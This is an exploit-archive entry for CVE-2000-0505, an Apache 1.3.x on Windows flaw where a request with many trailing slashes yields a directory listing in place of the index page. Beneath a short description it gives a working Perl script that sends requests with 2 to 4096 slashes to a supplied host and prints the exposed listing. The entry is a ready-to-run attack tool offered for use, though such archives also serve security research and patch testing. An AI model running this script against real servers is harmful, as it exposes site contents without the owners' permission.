Exploit Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access

[Exploiter]

EDB-ID

19975

Проверка EDB

1. Пройдено

Автор

H D MOORE

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-2000-0505

Дата публикации

2000-05-31

Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access

source: https://www.securityfocus.com/bid/1284/info

Apache HTTP Server 1.3.x (win32) allows people to get a directory listing of a directory, if it is enabled in the config, even if an index file is present that would normally be displayed instead. This can be achieved by sending a number of "/" characters appended to an HTTP request to the server. (eg: http://www.host.com///////////////////////////////////////////////////////...) When apache calls stat() to check if the index.html (for example) exists, Windows will return an error if the path is too long. Apache incorrectly treats this as if the file does not exist. Different numbers of "/"s are required based on the length of the path to the DocumentRoot. 

#!/usr/bin/perl

use LWP::Simple;
use strict;

my $host = shift() || die "usage:  $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $i;

$odata = get("http://$host/");
if ($odata eq "")
{
    die "no response from server:  $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}